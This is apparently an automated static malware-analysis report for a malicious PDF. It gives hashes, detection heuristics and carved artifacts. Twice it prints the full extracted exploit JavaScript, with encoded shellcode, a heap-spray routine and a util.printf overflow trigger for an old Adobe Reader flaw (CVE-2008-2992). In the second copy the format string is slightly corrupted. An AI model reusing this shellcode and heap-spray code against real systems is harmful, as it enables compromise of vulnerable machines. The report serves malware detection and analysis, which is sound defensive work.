Malicious PDF — malware analysis report

Static analysis result for SHA-256 358d66f3bb25c6e6…

MALICIOUS

PDF

1.95 MB Authoring application: Python PDF Library 055 http072057057pybrary056net057pyPdf057 First seen: 2026-05-11
MD5: a28f323f720c2c6d0b55f5a6b7e761ce SHA-1: 54f04bf7e6c39b614fe94510d9436b7342c7c577 SHA-256: 358d66f3bb25c6e65b9451a9f0e5aa876f185989a318decc8774ab0b151f7a1f
308 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 Service Execution: JavaScript

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The PDF_UNESCAPE heuristic suggests that the JavaScript is obfuscated, a common technique to evade detection. The extracted artifact javascript_obj0009_000.js is likely responsible for downloading and executing a second-stage payload. The lack of document body text means the specific lure cannot be determined, but the presence of obfuscated JavaScript points to a malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 7

  • JavaScript action low 4 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader JavaScript heap-spray exploit (known CVE family) critical CVE related PDF_JS_KNOWN_CVE_HEAPSPRAY_FAMILY
    PDF JavaScript combines heap-spray staging (NOP-sled / shellcode nybble sled or a multi-kilobyte setTimeOut/setInterval launcher) with the removed Adobe Reader sink util.printf, associated with CVE-2008-2992. Benign documents never pair heap-spray with these long-removed APIs. The exact malformed argument is assembled at run time, so this attributes the exploit to a known pre-2011 Reader CVE family rather than the exact primitive.
  • Obfuscated multi-stage PDF JavaScript heap-spray exploit critical CVE related PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY
    PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function exploit() {
var sc = unescape("%u4141%u4141%u30eb%ufc5e%u93ad%u8dad%u181c%u8dad%u1814%ud187%u5a56%u1e01%ue2ad%u56fb%u028b%u8591%u74c9%u8b0e%u045a%u1e01%ue2ad%u83fb%u08c2%ueceb%u5890%ud0ff%u9090%ucbe8%uffff%u4dff%u25ab%uf2f0%u4049%uc6a0%u9a0a%ue86f%u9a0a%udc6f%u0207%ud88b%u9a0a%u826f%u3415%uc1df%u9a0a%u756f%u2893%u7575%u2893%u39d0%u0d8e%u7021%ucd77%ue85c%ueef7%u5b6f%u9b23%u18d9%ue1cc%u9225%u7336%uf41b%uacc0%u1d0c%u0cf5%ua6ed%ua5ce%ubfe7%u8343%u20d4%u0de2%u43cc%uf68e%ue808%ufedf%uf16f%u234d%u0143%u7506%ue970% …
blah = repeat(128, unescape("%u9090%u9090%u9090%u9090%u9090")) + sc;
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0009_000.js pdf-javascript-stream PDF /JS object 9 at offset 0x2EE 1806 bytes
SHA-256: 7c11497226e12f3863cdbebc0ce22d62b411ec0c7a0346b9dc650ce60a5126ac
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function repeat(count,what) {
          var v = "";
          while (--count >= 0) v += what;
          return v;
}
function exploit() {
var sc = unescape("%u4141%u4141%u30eb%ufc5e%u93ad%u8dad%u181c%u8dad%u1814%ud187%u5a56%u1e01%ue2ad%u56fb%u028b%u8591%u74c9%u8b0e%u045a%u1e01%ue2ad%u83fb%u08c2%ueceb%u5890%ud0ff%u9090%ucbe8%uffff%u4dff%u25ab%uf2f0%u4049%uc6a0%u9a0a%ue86f%u9a0a%udc6f%u0207%ud88b%u9a0a%u826f%u3415%uc1df%u9a0a%u756f%u2893%u7575%u2893%u39d0%u0d8e%u7021%ucd77%ue85c%ueef7%u5b6f%u9b23%u18d9%ue1cc%u9225%u7336%uf41b%uacc0%u1d0c%u0cf5%ua6ed%ua5ce%ubfe7%u8343%u20d4%u0de2%u43cc%uf68e%ue808%ufedf%uf16f%u234d%u0143%u7506%ue970%u9b8d%ua8a9%u0a78%u5251%u0672%u4913%u046f%u28e5%uf43d%u1339%u1068%ue54a%u5835%ue849%uc842%uf15c%ud88d%u70f0%ub473%u7091%ua043%ueecf%ud88d%u7218%u1443%u2570%u2d3f%u73a4%ua651%ucdd0%u9787%ue4e4%u8486%u68e9%ubc2f%ue420%u2dd3%ua435%ub239%u5513%u07eb%ue4e4%u2402%u6339%uf3f1%uf9e2%u4128%u92e4%u5147%u92b5%u36f4%ufeee%u648d%u4d1b%ub9dd%u3e8f%ue9f5%u437c%u9278%ua1b4%u36f4%ubd50%u48cd%u2704%u6536%u3e90%u6548%u2761%u65cd%u3e90%uda5e%uaf04%u952f%u71bf%u9b25%u70be%u962a%u70be%u972a%u71be%u9b25%ua5bf%ucf34%u73cd%uc71b%ua2f2%ude32%ub909%u65f5%u9041");
blah = repeat(128, unescape("%u9090%u9090%u9090%u9090%u9090")) + sc;
bigblock = unescape("%u9090%u9090");
headersize = 20;
wap = headersize+blah.length
while (bigblock.length<wap) bigblock+=bigblock;
fillblock = bigblock.substring(0, wap);
block = bigblock.substring(0, bigblock.length-wap);
while(block.length+wap<0x40000) block = block+block+fillblock;
mm = new Array();
for (i=0;i<1400;i++) mm[i] = block + blah;
var s = util.printf("%2147483647.2147483647f",0);
return s;
}
var inBrowser = this.external;
if (inBrowser)
          var shaft = app.setTimeOut("exploit()",1200);
else

this.setAction("WillClose","exploit()");
javascript_obj0009_000_shellcode_00.bin pdf-js-shellcode pdf-js-unescape-shellcode recovered from PDF /JS object 9 at offset 0x2EE 340 bytes
SHA-256: 6590991eea38661d777f210c92b4a390a4eb305edcd9f92fa315827dcea23e40
generic_stage_recovery_000.js deobfuscated-js generic stage recovery percent-decode from JavaScript object 9 at offset 0x2EE 1804 bytes
SHA-256: 7700078ae75edd7a1493b6906cd7a66de949af683e5d0039ec9b39e7b482bdf6
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function repeat(count,what) {
          var v = "";
          while (--count >= 0) v += what;
          return v;
}
function exploit() {
var sc = unescape("%u4141%u4141%u30eb%ufc5e%u93ad%u8dad%u181c%u8dad%u1814%ud187%u5a56%u1e01%ue2ad%u56fb%u028b%u8591%u74c9%u8b0e%u045a%u1e01%ue2ad%u83fb%u08c2%ueceb%u5890%ud0ff%u9090%ucbe8%uffff%u4dff%u25ab%uf2f0%u4049%uc6a0%u9a0a%ue86f%u9a0a%udc6f%u0207%ud88b%u9a0a%u826f%u3415%uc1df%u9a0a%u756f%u2893%u7575%u2893%u39d0%u0d8e%u7021%ucd77%ue85c%ueef7%u5b6f%u9b23%u18d9%ue1cc%u9225%u7336%uf41b%uacc0%u1d0c%u0cf5%ua6ed%ua5ce%ubfe7%u8343%u20d4%u0de2%u43cc%uf68e%ue808%ufedf%uf16f%u234d%u0143%u7506%ue970%u9b8d%ua8a9%u0a78%u5251%u0672%u4913%u046f%u28e5%uf43d%u1339%u1068%ue54a%u5835%ue849%uc842%uf15c%ud88d%u70f0%ub473%u7091%ua043%ueecf%ud88d%u7218%u1443%u2570%u2d3f%u73a4%ua651%ucdd0%u9787%ue4e4%u8486%u68e9%ubc2f%ue420%u2dd3%ua435%ub239%u5513%u07eb%ue4e4%u2402%u6339%uf3f1%uf9e2%u4128%u92e4%u5147%u92b5%u36f4%ufeee%u648d%u4d1b%ub9dd%u3e8f%ue9f5%u437c%u9278%ua1b4%u36f4%ubd50%u48cd%u2704%u6536%u3e90%u6548%u2761%u65cd%u3e90%uda5e%uaf04%u952f%u71bf%u9b25%u70be%u962a%u70be%u972a%u71be%u9b25%ua5bf%ucf34%u73cd%uc71b%ua2f2%ude32%ub909%u65f5%u9041");
blah = repeat(128, unescape("%u9090%u9090%u9090%u9090%u9090")) + sc;
bigblock = unescape("%u9090%u9090");
headersize = 20;
wap = headersize+blah.length
while (bigblock.length<wap) bigblock+=bigblock;
fillblock = bigblock.substring(0, wap);
block = bigblock.substring(0, bigblock.length-wap);
while(block.length+wap<0x40000) block = block+block+fillblock;
mm = new Array();
for (i=0;i<1400;i++) mm[i] = block + blah;
var s = util.printf("!47483647.2147483647f",0);
return s;
}
var inBrowser = this.external;
if (inBrowser)
          var shaft = app.setTimeOut("exploit()",1200);
else

this.setAction("WillClose","exploit()");

Open this report in the interactive analyzer, or submit your own file for analysis.